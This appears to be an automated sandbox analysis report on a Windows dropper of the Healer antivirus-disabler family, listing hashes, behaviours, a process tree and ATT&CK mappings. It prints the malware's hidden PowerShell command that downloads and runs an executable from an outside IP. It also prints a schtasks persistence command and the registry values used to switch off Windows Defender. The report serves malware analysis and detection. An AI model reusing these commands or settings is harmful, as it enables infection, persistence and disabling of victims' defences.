Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
12/02/2025, 20:56
Static task
static1
Behavioral task
behavioral1
Sample
XEDT1_random.exe
Resource
win7-20250207-en
General
-
Target
XEDT1_random.exe
-
Size
938KB
-
MD5
6bf55c81166c49ca51a9f3224fe8a8f3
-
SHA1
efd7bf8fe47a45f024bec4542e087d3c6361bb06
-
SHA256
f1c3f0ad49ff3fb5241d62695254f26a734123153946fa012283ad0993665e63
-
SHA512
cc056102f57ab916b57dff8cfffa87684e3dfc20d695d6730e044dffa36c2a63f6864b5e5196d2cab8067f9b6b152f537f6b82dbaf23582e580d393c98b7b876
-
SSDEEP
24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8aell:OTvC/MTQYxsWR7ael
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2728-16-0x0000000000E90000-0x00000000012F0000-memory.dmp healer behavioral1/memory/2728-17-0x0000000000E90000-0x00000000012F0000-memory.dmp healer behavioral1/memory/2728-20-0x0000000000E90000-0x00000000012F0000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2816 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2816 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 4 2816 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Executes dropped EXE 1 IoCs
pid Process 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Loads dropped DLL 2 IoCs
pid Process 2816 powershell.exe 2816 powershell.exe -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XEDT1_random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1960 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2816 powershell.exe 2816 powershell.exe 2816 powershell.exe 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2728 TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 936 XEDT1_random.exe 936 XEDT1_random.exe 936 XEDT1_random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 936 XEDT1_random.exe 936 XEDT1_random.exe 936 XEDT1_random.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 936 wrote to memory of 2080 936 XEDT1_random.exe 31 PID 936 wrote to memory of 2080 936 XEDT1_random.exe 31 PID 936 wrote to memory of 2080 936 XEDT1_random.exe 31 PID 936 wrote to memory of 2080 936 XEDT1_random.exe 31 PID 936 wrote to memory of 2404 936 XEDT1_random.exe 32 PID 936 wrote to memory of 2404 936 XEDT1_random.exe 32 PID 936 wrote to memory of 2404 936 XEDT1_random.exe 32 PID 936 wrote to memory of 2404 936 XEDT1_random.exe 32 PID 2080 wrote to memory of 1960 2080 cmd.exe 34 PID 2080 wrote to memory of 1960 2080 cmd.exe 34 PID 2080 wrote to memory of 1960 2080 cmd.exe 34 PID 2080 wrote to memory of 1960 2080 cmd.exe 34 PID 2404 wrote to memory of 2816 2404 mshta.exe 35 PID 2404 wrote to memory of 2816 2404 mshta.exe 35 PID 2404 wrote to memory of 2816 2404 mshta.exe 35 PID 2404 wrote to memory of 2816 2404 mshta.exe 35 PID 2816 wrote to memory of 2728 2816 powershell.exe 37 PID 2816 wrote to memory of 2728 2816 powershell.exe 37 PID 2816 wrote to memory of 2728 2816 powershell.exe 37 PID 2816 wrote to memory of 2728 2816 powershell.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\XEDT1_random.exe"C:\Users\Admin\AppData\Local\Temp\XEDT1_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MlKlVmaplUg /tr "mshta C:\Users\Admin\AppData\Local\Temp\J78RdIkt2.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MlKlVmaplUg /tr "mshta C:\Users\Admin\AppData\Local\Temp\J78RdIkt2.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1960
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\J78RdIkt2.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE"C:\Users\Admin\AppData\Local\TempZXVKIDPOXPRVHVZYGEW5HYSVBQGS4U88.EXE"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
726B
MD508f5f75e22b4675329d1fe7b8458760c
SHA12b3403b8f13a9db9a1705e4343958609e779c004
SHA2564b5af35d085da05a4d558cfeed396db60d13cf12d4dabb8f5571ef90e38e95ff
SHA5127a3286261650f6a62db69b7b8faa79baf8de1f35901694d1f3b7c7188291b4f58df6de1773a9b0dbcbfb3d6e636e8247dc03112943eda6a6cc2084ea713be2eb
-
Filesize
1.7MB
MD53b29e113ece646262a8afe7712828b3f
SHA13698b91166a8e83e1dea5ace3af22f5d77f2b402
SHA25685f22c26a9c8c05c731325c3921b0ffc5c9bca06434b8523a273e79d82b6eae2
SHA512bcda7ac2400423d06fb30e8880a38757aeb8528e94386831d852b55c8f03b8806e60d45f5c777079aebeba3cf9d9010dcc97eef1c3a9ea3b4f0e8e58ede16476